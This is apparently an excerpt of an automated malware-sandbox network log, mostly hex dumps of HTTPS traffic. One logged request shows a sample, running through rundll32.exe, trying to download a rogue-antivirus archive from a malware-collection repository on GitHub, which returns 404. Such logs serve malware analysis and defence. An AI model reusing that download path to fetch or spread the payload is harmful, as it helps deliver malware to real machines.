                                                                                                                                                            2022-09-29 12:45:32 UTC37831INData Raw: 35 91 eb b2 78 8b 04 6c 69 7f fb 02 50 56 9c bd 96 de c1 02 d6 9e 81 af f8 33 59 18 ca 13 35 02 60 8b bd f7 3f 72 35 32 bd 4b 8d 09 05 20 1e 7a ea ef 55 a7 44 98 36 8d e4 92 df 08 a7 65 40 a5 18 51 d9 cd e3 c8 35 85 9b a5 4e c5 3f 3e e0 df 3d ee bd 15 a4 79 61 12 c9 8e a2 c2 af 2d d3 09 b0 05 c4 b0 ce 68 4d ae 60 8d db ac 08 a2 27 05 8d 92 26 78 b7 a8 c3 33 fc e6 bf 1e 35 ec 0c 15 a9 28 35 00 75 bc ce eb fc b3 bc 95 1a e1 0f 9e 6f 01 f9 49 79 e0 43 cd 94 71 83 bd 62 a1 81 16 dd ee 52 6f 28 2c 99 c1 bc bd 36 d4 f7 89 27 8e 14 cd bb c8 5e cb b1 85 e4 dd c9 b1 df c6 eb 50 d6 6c e4 33 a5 cd 27 7f 9f 14 34 a8 ae 69 1e 7b 20 2b c9 43 01 c3 b9 1b 9b df ee 56 b8 42 e6 a9 53 12 64 f3 d0 f6 70 f3 67 e4 d0 22 b0 a9 f9 de de 00 fb 1e ad 4f e3 b5 2d ca fb c6 ec 90 7c
                                                                                                                                                            Data Ascii: 5xliPV3Y5`?r52K zUD6e@Q5N?>=ya-hM`'&x35(5uoIyCqbRo(,6'^Pl3'4i{ +CVBSdpg"O-|
                                                                                                                                                            2022-09-29 12:45:32 UTC37847INData Raw: 4f c7 b0 7c da 70 96 01 d0 09 d7 36 38 ef bb b0 1a b3 8a 91 ba b4 1d ce 62 d2 62 1f 08 1c cf 10 3c cb e6 6e 2e 43 8b 9e 0f 5d a2 d3 51 d5 77 49 c1 96 37 d8 49 1f 52 a2 f8 31 fc 4c 89 29 04 91 59 e1 f3 76 f4 89 44 38 2c fd ea 94 0e 06 41 56 50 8e 1d 60 cf 2b 9a f6 47 15 8e 82 4e 11 db 30 e3 7c 68 9d 1c af 29 72 66 8b d0 0f fb 54 17 10 0b 57 50 52 ba 72 36 f8 c4 b7 28 f8 f3 f7 06 3f 4b be ec 0a 4e e8 d4 05 55 65 1a 9c bc cb 97 1c 3a a6 89 ac 58 3f f3 7b f2 47 6e 76 46 d8 f4 89 d2 40 a9 43 fb 28 b1 1f db a7 59 45 5a 47 78 f4 f1 6d 0d 42 97 3b 23 5d 29 5f ca 6c 3e 4f d2 42 2e 5a 2a 17 b4 65 3d 2f ff 33 19 5e f7 f0 a1 a0 37 6a c9 8a 13 9d 5c af 60 9c 24 51 36 4e 89 e1 17 ab 7b 84 56 0c 5c c4 51 17 70 ba 0a 58 f2 67 72 ee d0 b6 7c 6a 4e ac 88 44 9d bf 9e 64 52
                                                                                                                                                            Data Ascii: O|p68bb<n.C]QwI7IR1L)YvD8,AVP`+GN0|h)rfTWPRr6(?KNUe:X?{GnvF@C(YEZGxmB;#])_l>OB.Z*e=/3^7j\`$Q6N{V\QpXgr|jNDdR
                                                                                                                                                            2022-09-29 12:45:32 UTC37863INData Raw: 80 e6 4f a8 24 2c a4 e3 7a b5 ab 7c ca 5e 0a 2f 57 1c 38 67 89 0b 24 07 c2 46 c8 ff 85 f0 0d 0e 6b 3b 4d 8b 0c c2 3e e4 15 d6 00 88 97 11 8c 6a 75 77 90 40 59 1d a6 94 46 af 92 9b 3f 39 04 de b4 c2 b4 bb 69 69 f3 20 92 f2 d0 66 d0 ba da 5b bf ce 85 6a fa 38 22 d6 78 0b 4d 0d f4 d3 5d 7e 6e fa 76 03 e9 0e a1 1a 0d d7 6a 6b 90 32 d2 fd 7a 69 71 a8 b1 bc d9 f2 60 01 60 3a 6a 99 2e b9 1d 9d 4a d3 3e 11 ac 47 ec 5a 75 9b 7e 02 f2 de 74 16 b7 8b e1 3f e1 45 be a3 ca 70 da e7 90 82 8e 38 4d cc e3 0b 9f 90 ea 0c 07 80 ea ca 40 34 34 97 e3 b9 37 4e 92 14 e2 90 39 1d c2 65 5a 74 a6 99 0b cc 9f 00 8e 84 cd d3 98 38 f4 f8 84 28 b5 83 09 23 7d 33 0f 75 00 8c fb 25 08 99 63 27 e2 0e 91 a2 c6 84 74 b8 09 93 9f 8c 5a 7b 08 f4 f6 3b 96 98 bf bf dd ce 10 b0 4c 3f 12 e0 56
                                                                                                                                                            Data Ascii: O$,z|^/W8g$Fk;M>juw@YF?9ii f[j8"xM]~nvjk2ziq``:j.J>GZu~t?Ep8M@447N9eZt8(#}3u%c'tZ{;L?V
                                                                                                                                                            2022-09-29 12:45:32 UTC37879INData Raw: d7 1b c5 a0 0c 2a 81 da e9 7a 0c af d9 a0 53 89 8d 0a a8 1b 6b 8d e4 91 e9 44 b9 91 e8 93 41 72 d4 73 13 c4 bf 2d 56 f3 b9 40 23 8c 93 d4 d5 17 4e 10 40 4c 97 a9 83 b5 da 7e 02 e0 ab 44 93 23 26 a0 9e a0 7e 87 c7 aa 7a d2 02 15 b0 8c 4b bb 51 6c 5b 50 28 2c 83 de 7c 68 d4 8b 24 21 5d 1c 7f ef 30 b3 73 94 41 76 de 13 1b e8 ea 5d 35 ce 94 b3 11 bf 57 b4 ca 5a 8e 48 df a7 ea 52 97 75 bb a0 55 aa 19 44 68 f2 e0 ac a2 ac 76 58 b8 9c c7 47 d8 37 ce 78 ed b6 85 e4 d1 a4 93 6c c6 38 4e e8 8e 58 a1 86 85 e5 db d1 c1 15 8d 17 94 20 9b de 76 e8 05 d4 ad 61 10 50 d1 0c 5b 86 bf e4 17 e3 41 0e 1e d0 c3 6b 05 e5 ed d1 56 e0 a0 86 39 cd d5 6e 41 b0 1b 6f 1e c9 db 40 62 16 b4 d0 40 4b b9 c1 8c e7 7d e6 19 82 00 eb 14 33 7b ce 37 4d eb e3 2f f7 55 6d 00 73 b2 4d 56 be e6
                                                                                                                                                            Data Ascii: *zSkDArs-V@#N@L~D#&~zKQl[P(,|h$!]0sAv]5WZHRuUDhvXG7xl8NX vaP[AkV9nAo@b@K}3{7M/UmsMV
                                                                                                                                                            2022-09-29 12:45:32 UTC37895INData Raw: e2 fd 48 f1 a1 8f de 58 f9 70 63 2c 97 07 1e 04 aa e9 ea ec bf a2 1c d2 5f c5 c6 ab b1 c4 d6 60 38 02 8b 3f b7 86 98 a1 40 50 0e b2 74 e5 7b 85 80 02 17 0f 7f 78 d2 7a e1 09 11 66 4f a7 c3 5e 0c 97 89 10 38 24 37 d4 90 0f f1 ff a0 58 cd 9d 70 78 b7 ce 75 ef 18 e4 76 af 05 c3 ae f7 53 42 c6 e8 77 b2 b0 12 be 7a 07 e9 cb 03 51 06 ac b7 1a 82 61 ae d7 8f 8b 2b 31 e8 70 d6 7f d0 53 0b 57 3e 1f 63 fa 17 4d 24 9f f2 8d 71 76 8c 2e 1b e5 e1 cb d2 6c be 43 00 a4 6e 4f 94 6c da 2d a5 72 6e 7f 2c 1a 7e 8c b3 55 57 18 84 dd a7 7d 66 31 7f 99 cf b9 41 08 4b 7f c7 bf 05 2e f1 3f b3 10 29 67 65 6b e7 82 12 7b c1 54 b9 35 bd bd ea fb 85 02 00 31 09 d1 d1 f4 67 85 6a 22 c7 41 de 04 f5 d2 0f 32 01 b1 77 20 40 78 20 7c 52 f3 b1 fd 64 d0 ee 9a 69 1c 0d e0 b6 da 15 08 33 00
                                                                                                                                                            Data Ascii: HXpc,_`8?@Pt{xzfO^8$7XpxuvSBwzQa+1pSW>cM$qv.lCnOl-rn,~UW}f1AK.?)gek{T51gj"A2w @x |Rdi3
                                                                                                                                                            2022-09-29 12:45:32 UTC37911INData Raw: 23 4c 03 05 38 07 c1 ee 81 88 13 d9 45 96 e4 2e a9 5d c7 2a a9 ac 61 59 1f d8 3d 9a 59 d1 85 e3 93 1b 0e 80 8b c9 0e 0a aa d3 b4 9f 0f cf 8b ab 6e 6a 6b fc b2 31 5a 46 20 f6 7c 4e 36 38 2d f7 ac ce e0 73 aa fd 20 59 f8 35 29 5c c6 71 6b 5b 60 fe 8f be 29 c0 09 b3 aa 8b 94 30 1e ef c9 2e cc e2 3f b1 8b c1 d5 ec 84 45 6d c2 92 bb 46 87 20 fe bd 57 98 58 26 dc 2f 31 98 68 cb 1f ac 24 75 67 d5 47 a0 9b 23 02 37 29 a8 ef 51 4a de fe 57 29 39 05 58 3f 5c 74 c0 23 7e 2e 03 e5 15 fd e1 3e 0f 03 ad a5 6a 53 db 95 4f 77 64 35 78 7c f2 83 51 70 3c 9f 66 66 6c d3 3b 7a 3a 2c 26 0d b1 3b d8 6e da 92 78 ee b6 e6 4a f6 a3 fa 56 e7 b6 fb 6b 98 18 a6 f1 c7 98 fd 91 30 d7 11 58 72 9a 83 71 17 6e 59 4a 2d f1 e5 57 49 7a 85 b6 4c 80 0e d5 5e 07 52 09 5e ba bf b2 91 41 65 1b
                                                                                                                                                            Data Ascii: #L8E.]*aY=Ynjk1ZF |N68-s Y5)\qk[`)0.?EmF WX&/1h$ugG#7)QJW)9X?\t#~.>jSOwd5x|Qp<ffl;z:,&;nxJVk0XrqnYJ-WIzL^R^Ae
                                                                                                                                                            2022-09-29 12:45:32 UTC37927INData Raw: 1a d4 52 e9 3a 28 84 bc bc 9b e2 1b 69 92 20 2d 1a b1 0a 75 51 d2 18 d1 6d bf 56 38 4c 3a 84 28 92 5b 6f 42 7c 35 1f b3 c7 79 a5 ad 97 8a e0 dc 7c b9 e9 74 95 80 47 2d df 2f e1 95 13 0e 11 29 16 1b 36 ba fc 14 15 c7 21 28 75 e8 f0 47 83 97 8a fe fb 60 f4 43 72 08 65 cf bf 09 11 f2 c7 8c 8d 87 fa ee a5 d8 07 da ae f1 81 db 0f af 74 8d 52 74 e8 d3 e1 f1 3e f0 e7 7c 0f 04 e2 51 50 7e f4 7a 65 8b 58 0f 0c a5 05 43 18 75 0b 33 b8 38 ae 63 ed 59 3b 29 af 9e 57 8a 86 6f 92 4c e5 49 0e 37 49 42 c8 87 3e 99 8d 47 11 ab 24 08 24 80 2a 7c d8 f1 ee 80 fd e7 34 18 e5 d7 80 b4 16 0c fc 9b 4a e2 3a 6a 47 94 6b d7 aa d9 b6 ea cb 46 5d 51 ae d1 06 d2 45 89 b9 7c 00 35 d7 ad 3f ea 76 33 b6 03 81 72 8b cf e6 8d 59 ab e8 e3 e5 e7 de dc 16 7b 53 7f ea 8e 2c 5d e6 72 07 c8 92
                                                                                                                                                            Data Ascii: R:(i -uQmV8L:([oB|5y|tG-/)6!(uG`CretRt>|QP~zeXCu38cY;)WoLI7IB>G$$*|4J:jGkF]QE|5?v3rY{S,]r
                                                                                                                                                            2022-09-29 12:45:32 UTC37943INData Raw: 34 7a 70 20 01 df db 76 14 90 4d 96 e3 38 8f b3 4f 0f c0 85 77 b4 e6 08 39 a9 b5 a5 64 39 af b6 a3 d0 ce 88 d1 5f 47 a1 c7 63 32 fe ba 23 32 71 6f e9 f9 30 0e eb 9c 2e 3a 6f 9f b3 48 18 b4 ed fa 16 d6 f5 03 f6 93 62 af bb 97 18 3c 40 9f 21 1c f2 6a 8e d1 9e 7c f5 9e 08 02 c1 23 59 5e 05 a7 7f a7 a6 37 14 89 75 5f ed 40 ee 39 f1 3a de e2 9f 08 62 80 ad 59 75 88 a0 9c 95 40 16 25 6e 7b 8e b7 4e 4e 44 b5 02 c2 3c 13 55 97 ce 43 24 7a 2a 34 61 b5 a0 15 ca ca 33 5e 7d 64 90 f1 3b de 6b 5d 1b 4c 6a ba f1 0f ca 1d f4 20 2d a2 95 cd 37 fb 7a 68 1d 17 e0 ea 3e b2 91 ce db ab 2f 7e fc 54 5f 7b 52 11 f7 68 71 96 34 1f f1 c4 69 1f 84 b2 d5 b6 8e b6 5a 60 fa 82 0e 4f 7e f1 c1 50 a2 37 ed 9c fc 67 e4 92 53 03 c8 71 3b 7e ad f1 0a ab ca 57 a4 a2 c7 ce f5 91 7b 2f 70 62
                                                                                                                                                            Data Ascii: 4zp vM8Ow9d9_Gc2#2qo0.:oHb<@!j|#Y^7u_@9:bYu@%n{NND<UC$z*4a3^}d;k]Lj -7zh>/~T_{Rhq4iZ`O~P7gSq;~W{/pb
                                                                                                                                                            2022-09-29 12:45:32 UTC37959INData Raw: 26 29 69 bd c9 25 fb a9 4f 0f bc d4 37 68 d5 43 29 c4 a9 72 22 31 a8 9a a9 9c a3 e9 44 90 2e f7 59 9d 17 ad b5 70 23 35 1b f0 6a ad 54 9d 2f d9 78 e6 14 ad d7 e0 ea fe 19 40 3a 78 a1 e2 59 dc e8 1e f6 79 c5 8a 01 14 4f 9b 06 c9 4b 5a b1 d6 d6 ea b2 ac 43 af 4b b4 4c dc ab dd 32 ff 44 da c7 1b f6 f7 73 6e 7e be 1f 75 cc 90 fb b4 24 07 92 97 01 6f 51 67 97 45 a4 0a 17 03 76 12 ab 2e 03 21 8b 00 10 7a bf 6f 75 00 36 79 a3 aa 9f fd 16 15 e6 dc da f0 38 96 f6 49 b1 ff 83 84 e3 d8 57 01 d6 18 c0 00 11 ca c2 07 bd ff bb e1 41 24 35 d7 ef fa d3 57 46 74 e8 4e cb 69 ee dd c7 77 55 74 53 65 87 b4 5b 94 37 5c 80 87 1d fc e4 de f0 c5 a3 bb 6f c7 79 8a a1 51 a3 94 50 37 bb 41 b9 c0 73 e0 0d 7e 21 34 fc f0 c6 90 0b 79 fb e9 f5 64 2b 93 23 8a 5e 09 1e 4b e9 1b cc 18 9d
                                                                                                                                                            Data Ascii: &)i%O7hC)r"1D.Yp#5jT/x@:xYyOKZCKL2Dsn~u$oQgEv.!zou6y8IWA$5WFtNiwUtSe[7\oyQP7As~!4yd+#^K
                                                                                                                                                            2022-09-29 12:45:32 UTC37975INData Raw: 7c 8a 1a af 65 f3 3b 7e 79 8a 08 d9 59 01 a3 95 e0 8b 7b 10 8d 24 61 3f fa d6 4c 82 45 f4 8e 74 b1 79 5c b7 1b 8d fa 5c ec c0 a2 02 94 fc 2c 23 f7 4f 5c 15 d2 f8 df dd 03 4a 8f 9d cd 1f 23 42 a3 f4 5a 5f 00 56 10 c5 7d 7f 7a 3c 6b d2 32 60 6b 6c a4 68 a9 a5 69 a7 2a 27 09 a7 1a a8 a9 22 f2 3d 3c 86 50 93 51 d8 b5 d2 e7 ce 95 ca 1b 05 72 fc 7e 9e f6 b5 28 8f 40 95 5c 1c 91 58 29 08 ea f2 fa 67 b4 92 ea 13 b8 02 95 48 4b cd 24 e5 a8 8f 42 70 59 3e fc 26 fb a8 b8 3f 79 ca f9 dd 5b 12 b8 d7 7b 95 41 dc 73 88 a5 17 f3 5d 7c 94 92 28 8b 98 81 2f 24 0b ce 2e 6c 2f 88 d0 31 32 20 3e d5 3a e1 e9 69 81 fc f2 cb e8 10 36 72 f7 e5 6d 26 f1 62 87 4b 9e c8 56 7b c6 16 b0 c2 87 aa 91 fd 45 c1 6e 44 d8 80 5c 89 7f 40 bd 44 24 02 46 52 5a 40 d4 b4 83 3c c9 0b ce 5c 21 58
                                                                                                                                                            Data Ascii: |e;~yY{$a?LEty\\,#O\J#BZ_V}z<k2`klhi*'"=<PQr~(@\X)gHK$BpY>&?y[{As]|(/$.l/12 >:i6rm&bKV{EnD\@D$FRZ@<\!X


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            138192.168.2.649777140.82.121.4443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            2022-09-29 12:45:34 UTC37978OUTGET /Endermanch/MalwareDatabase/raw/master/rogues/Win7Recover.zip HTTP/1.1
                                                                                                                                                            Host: github.com


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            139140.82.121.4443192.168.2.649777C:\Users\user\Desktop\bpkAAJptGv.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            2022-09-29 12:45:34 UTC37978INHTTP/1.1 404 Not Found
                                                                                                                                                            Server: GitHub.com
                                                                                                                                                            Date: Thu, 29 Sep 2022 12:45:34 GMT
                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                            Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                                                                            X-Frame-Options: deny
                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                            Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                            Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
                                                                                                                                                            2022-09-29 12:45:34 UTC37978INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 62 6c 6f 63 6b 2d 61 6c 6c 2d 6d 69 78 65 64 2d 63 6f 6e 74 65 6e 74 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 6f 62 6a 65 63 74 73 2d 6f 72 69 67 69 6e 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e
                                                                                                                                                            Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.
                                                                                                                                                            2022-09-29 12:45:34 UTC37980INData Raw: 33 42 39 31 0d 0a 0a 0a 0a 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 61 74 61 2d 63 6f 6c 6f 72 2d 6d 6f 64 65 3d 22 61 75 74 6f 22 20 64 61 74 61 2d 6c 69 67 68 74 2d 74 68 65 6d 65 3d 22 6c 69 67 68 74 22 20 64 61 74 61 2d 64 61 72 6b 2d 74 68 65 6d 65 3d 22 64 61 72 6b 22 20 64 61 74 61 2d 61 31 31 79 2d 61 6e 69 6d 61 74 65 64 2d 69 6d 61 67 65 73 3d 22 73 79 73 74 65 6d 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 64 6e 73 2d 70 72 65 66 65 74 63 68 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 22 3e 0a 20
                                                                                                                                                            Data Ascii: 3B91<!DOCTYPE html><html lang="en" data-color-mode="auto" data-light-theme="light" data-dark-theme="dark" data-a11y-animated-images="system"> <head> <meta charset="utf-8"> <link rel="dns-prefetch" href="https://github.githubassets.com">
                                                                                                                                                            2022-09-29 12:45:34 UTC37980INData Raw: 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 76 61 74 61 72 73 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 22 3e 0a 0a 0a 0a 20 20 3c 6c 69 6e 6b 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74
                                                                                                                                                            Data Ascii: <link rel="preconnect" href="https://github.githubassets.com" crossorigin> <link rel="preconnect" href="https://avatars.githubusercontent.com"> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/asset
                                                                                                                                                            2022-09-29 12:45:34 UTC37982INData Raw: 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 64 61 74 61 2d 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 6c 69 67 68 74 5f 74 72 69 74 61 6e 6f 70 69 61 2d 63 64 64 38 38 66 31 34 36 62 66 37 2e 63 73 73 22 20 2f 3e 3c 6c 69 6e 6b 20 64 61 74 61 2d 63 6f 6c 6f 72 2d 74 68 65 6d 65 3d 22 64 61 72 6b 5f 74 72 69 74 61 6e 6f 70 69 61 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 64 61 74 61 2d 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74
                                                                                                                                                            Data Ascii: gin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/light_tritanopia-cdd88f146bf7.css" /><link data-color-theme="dark_tritanopia" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.git
                                                                                                                                                            2022-09-29 12:45:34 UTC37983INData Raw: 5f 73 74 61 63 6b 74 72 61 63 65 2d 70 61 72 73 65 72 5f 64 69 73 74 5f 73 74 61 63 6b 2d 74 72 61 63 65 2d 70 61 72 73 65 72 5f 65 73 6d 5f 6a 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 62 72 6f 2d 64 33 35 31 66 36 2d 63 31 64 36 33 64 32 33 30 62 32 39 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 65 6e 76 69 72 6f 6e 6d 65 6e 74 2d 30 36 38 38 66 63 32 38 33 66 64 34 2e 6a 73
                                                                                                                                                            Data Ascii: _stacktrace-parser_dist_stack-trace-parser_esm_js-node_modules_github_bro-d351f6-c1d63d230b29.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/environment-0688fc283fd4.js
                                                                                                                                                            2022-09-29 12:45:34 UTC37984INData Raw: 5f 69 6e 64 65 78 5f 6a 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 74 69 6d 65 2d 65 6c 65 6d 65 6e 74 73 5f 64 69 73 74 5f 69 6e 64 65 78 5f 6a 73 2d 33 38 63 33 36 61 35 39 37 31 38 34 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 66 69 6c 65 2d 61 74 74 61 63 68 6d 65 6e 74 2d 65 6c 65 6d 65 6e
                                                                                                                                                            Data Ascii: _index_js-node_modules_github_time-elements_dist_index_js-38c36a597184.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_file-attachment-elemen
                                                                                                                                                            2022-09-29 12:45:34 UTC37986INData Raw: 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 70 61 73 74 65 2d 6d 61 72 6b 64 6f 77 6e 5f 64 69 73 74 5f 69 6e 64 65 78 5f 65 73 6d 5f 6a 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 6b 6f 64 64 73 73 6f 6e 5f 74 65 78 74 61 72 65 61 2d 63 2d 35 38 36 66 37 38 2d 61 61 64 30 66 61 30 31 63 37 39 32 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20
                                                                                                                                                            Data Ascii: ymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_paste-markdown_dist_index_esm_js-node_modules_koddsson_textarea-c-586f78-aad0fa01c792.js"></script><script crossorigin="anonymous"
                                                                                                                                                            2022-09-29 12:45:34 UTC37987INData Raw: 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 61 70 70 5f 61 73 73 65 74 73 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 62 65 68 61 76 69 6f 72 73 5f 63 6f 6d 6d 65 6e 74 69 6e 67 5f 65 64 69 74 5f 74 73 2d 61 70 70 5f 61 73 73 65 74 73 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 62 65 68 61 76 69 6f 72 73 5f 68 74 2d 38 33 63 32 33 35 2d 64 62 37 39 35 39 62 35 66 66 66 39 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69
                                                                                                                                                            Data Ascii: rossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_behaviors_commenting_edit_ts-app_assets_modules_github_behaviors_ht-83c235-db7959b5fff9.js"></script><script crossori
                                                                                                                                                            2022-09-29 12:45:34 UTC37988INData Raw: 65 3d 22 76 69 73 69 74 6f 72 2d 70 61 79 6c 6f 61 64 22 20 63 6f 6e 74 65 6e 74 3d 22 65 79 4a 79 5a 57 5a 6c 63 6e 4a 6c 63 69 49 36 62 6e 56 73 62 43 77 69 63 6d 56 78 64 57 56 7a 64 46 39 70 5a 43 49 36 49 6a 67 33 4d 7a 49 36 51 7a 63 31 52 6a 6f 79 4f 55 55 34 4d 7a 49 35 4f 6a 4a 42 52 44 4d 78 51 54 51 36 4e 6a 4d 7a 4e 54 6b 7a 4e 6b 55 69 4c 43 4a 32 61 58 4e 70 64 47 39 79 58 32 6c 6b 49 6a 6f 69 4d 54 4d 78 4d 54 63 79 4e 44 67 7a 4f 54 67 79 4e 6a 63 79 4e 44 59 69 4c 43 4a 79 5a 57 64 70 62 32 35 66 5a 57 52 6e 5a 53 49 36 49 6d 5a 79 59 53 49 73 49 6e 4a 6c 5a 32 6c 76 62 6c 39 79 5a 57 35 6b 5a 58 49 69 4f 69 4a 70 59 57 51 69 66 51 3d 3d 22 20 64 61 74 61 2d 74 75 72 62 6f 2d 74 72 61 6e 73 69 65 6e 74 3d 22 74 72 75 65 22 20 2f 3e 3c 6d
